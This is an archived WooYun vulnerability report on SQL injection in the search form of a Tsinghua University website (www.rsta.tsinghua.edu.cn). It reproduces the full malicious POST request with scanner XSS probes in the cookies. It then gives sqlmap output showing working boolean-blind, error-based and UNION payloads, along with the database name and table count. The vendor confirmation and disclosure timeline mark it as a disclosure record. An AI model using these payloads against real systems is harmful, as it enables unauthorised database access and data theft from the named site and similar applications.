WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
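2015-11-28: Details reported to the vendor; awaiting vendor handling
2015-11-30: Vendor confirmed; details disclosed to the vendor only
2015-12-10: Details disclosed to core white hats and experts in related fields
2015-12-20: Details disclosed to regular white hats
2015-12-30: Details disclosed to trainee white hats
2016-01-14: Details disclosed to the public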
POST /search/znss.php HTTP/1.1
Content-Length: 212
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.rsta.tsinghua.edu.cn
Cookie: thuwebcookie=2668064522.20480.0000; PHPSESSID=cv9p2coj4nvsvoce85ob9l36g6; CNZZDATA2049882=cnzz_eid%3D254369399-1448558447-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1448558447; tq_source_page_url=http://www.acunetix-referrer.com/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); tq_current_visit_time=1448558445174; tq_current_source_page_url=http://www.acunetix-referrer.com/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); SRV=20
Host: www.rsta.tsinghua.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

hangye=%e4%bc%81%e4%b8%9a&lingyu=%e8%af%b7%e9%80%89%e6%8b%a9&lingyu1=-1' OR 1=1* -- &lingyu2=%e5%85%a8%e9%83%a8%e9%a2%86%e5%9f%9f&lingyu3=%e8%af%b7%e9%80%89%e6%8b%a9&neirong=1
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: hangye=%e4%bc%81%e4%b8%9a&lingyu=%e8%af%b7%e9%80%89%e6%8b%a9&lingyu1=-1' OR 1=1 AND 5804=5804 -- &lingyu2=%e5%85%a8%e9%83%a8%e9%a2%86%e5%9f%9f&lingyu3=%e8%af%b7%e9%80%89%e6%8b%a9&neirong=1

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: hangye=%e4%bc%81%e4%b8%9a&lingyu=%e8%af%b7%e9%80%89%e6%8b%a9&lingyu1=-1' OR 1=1 AND (SELECT 2349 FROM(SELECT COUNT(*),CONCAT(0x716b706b71,(SELECT (ELT(2349=2349,1))),0x71626a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) -- &lingyu2=%e5%85%a8%e9%83%a8%e9%a2%86%e5%9f%9f&lingyu3=%e8%af%b7%e9%80%89%e6%8b%a9&neirong=1

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: hangye=%e4%bc%81%e4%b8%9a&lingyu=%e8%af%b7%e9%80%89%e6%8b%a9&lingyu1=-1' OR 1=-7185 UNION ALL SELECT NULL,NULL,CONCAT(0x716b706b71,0x616a43726250595a6d54,0x71626a7171),NULL,NULL-- -- &lingyu2=%e5%85%a8%e9%83%a8%e9%a2%86%e5%9f%9f&lingyu3=%e8%af%b7%e9%80%89%e6%8b%a9&neirong=1
---
web application technology: Nginx
back-end DBMS: MySQL 5.0
Database: hdm0050741_db
[103 tables]
Severity: High
Vulnerability Rank: 15
Confirmed: 2015-11-30 14:38
Thank you for the reminder; we will handle this as soon as possible.
None yet